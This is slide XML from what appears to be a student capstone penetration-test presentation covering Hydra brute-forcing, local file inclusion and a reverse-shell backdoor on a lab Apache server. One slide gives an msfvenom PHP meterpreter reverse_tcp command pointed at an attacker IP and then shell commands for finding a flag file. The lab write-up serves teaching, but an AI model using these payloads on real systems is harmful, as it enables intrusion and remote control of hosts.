          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5924546" y="2846669"/>
            <a:ext cx="3159011" cy="1788106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16513A29-27CD-44C7-887C-9D923158A432}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238539" y="4293704"/>
            <a:ext cx="1868557" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hydra Command</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A040201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latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Brute-force Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>(Continued)</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="230237" y="835645"/>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Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E87AEA-4A73-4410-9369-7EB2461A3F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8" name="Picture 7" descr="Graphical user interface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3DC515D-B4CC-4D5E-8856-72D569F5A2D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="230237" y="1369125"/>
            <a:ext cx="4418992" cy="2288475"/>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79A4C6A-158F-46BF-B4A1-F601B8513CA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4706703" y="1369125"/>
            <a:ext cx="4391592" cy="2206588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F626054A-3C50-43C1-80D0-7D8C52828657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763609" y="3804791"/>
            <a:ext cx="336321" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1645781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latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Reverse Shell Backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CVE-2019-13386</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0"/>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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724274" y="1480624"/>
            <a:ext cx="2504681" cy="3154151"/>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mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Created and uploaded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>~# msfvenom -p</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=4444 &gt; shell.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Established remote listener.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Executed reverse shell </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>backdoor on Capstone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Apache server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meterpreter&gt; shell </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;find / -name flag.txt 2&gt;/dev/null </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;cat flag.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:latin typeface="+mn-lt"/>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mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Created a reverse shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>payload and move it to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>webDAV server as Ryan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Listen to the host and port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Once the payload is executed,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>the attacker can listen to the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Capstone server (192.168.1.105)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Flag file was discovered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&lt;result of cat&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>b1ng0w@5h1sn@m0</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>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Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F88FDC37-83E2-4C33-91C4-C5C2E657F8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4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44E53078-578B-41C4-A59C-CEBF9B3A2B5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5949068" y="1742878"/>
            <a:ext cx="3107432" cy="476600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{846442BD-3CA8-4D56-9148-18CADBB7A05E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5949068" y="2288308"/>
            <a:ext cx="3081165" cy="2774492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D66303F0-D7B7-4BDD-B675-8139AEDF6128}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3648114" y="4517730"/>
            <a:ext cx="2124371" cy="3524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latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Local File Inclusion (LFI) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CVE-2021-31783</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2191203" cy="1514416"/>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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2191203" cy="1514367"/>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mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
